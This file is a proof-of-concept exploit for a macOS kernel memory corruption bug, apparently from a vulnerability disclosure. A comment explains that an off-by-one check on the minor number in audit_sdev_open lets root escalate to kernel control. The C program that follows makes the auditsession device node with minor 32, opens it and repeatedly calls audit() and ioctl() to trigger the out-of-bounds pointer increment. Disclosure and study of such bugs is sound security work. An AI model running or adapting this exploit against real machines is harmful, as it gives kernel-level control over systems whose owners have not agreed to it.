// ianbeer
#if 0
MacOS kernel memory corruption due to off-by-one in audit_sdev_open

The auditsession device has a copy-pasted version of the same bug as the auditpipe device:

	static int
	audit_sdev_open(dev_t dev, __unused int flags,  __unused int devtype, proc_t p)
	{
		struct audit_sdev *asdev;
		struct auditinfo_addr aia;
		int u;

		u = minor(dev);
		if (u < 0 || u > MAX_AUDIT_SDEVS)
			return (ENXIO);

		(void) audit_sdev_get_aia(p, &aia);

		AUDIT_SDEV_LIST_WLOCK();
		asdev = audit_sdev_dtab[u];


Again, that bounds check on the minor number should be >= MAX_AUDIT_SDEVS.

In the auditsession case we again end up with that oob pointer being confused with a counter,
in this case audit_sdev_drops allowing us to aritrarily increment a struct audit_sdev pointer.

This is a root -> kernel privesc as you need to be able to mknod the auditsession device with a controlled
minor number.

tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
#endif

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <net/bpf.h>
#include <net/if.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <bsm/audit.h>
#include <security/audit/audit_ioctl.h>

int main(int argc, char** argv) {
  system("rm -rf auditsession");
  system("mknod auditsession c 10 32");

  int fd = open("auditsession", O_RDWR);

  if (fd == -1) {
    perror("failed to open auditsession device\n");
    exit(EXIT_FAILURE);
  }
  printf("opened device\n");

  system("touch a_log_file");
  int auditerr = auditctl("a_log_file");
  if (auditerr == -1) {
    perror("failed to set a new log file\n");
  }

  while(1) {
    char* audit_data = "\x74hello";
    int audit_len = strlen(audit_data)+1;
    audit(audit_data, audit_len);
    uint32_t nread = 0;
    int err = ioctl(fd, FIONREAD, &nread);
    if (err == -1) {
      perror("FIONREAD");
      exit(EXIT_FAILURE);
    }
  }

  return 0;
}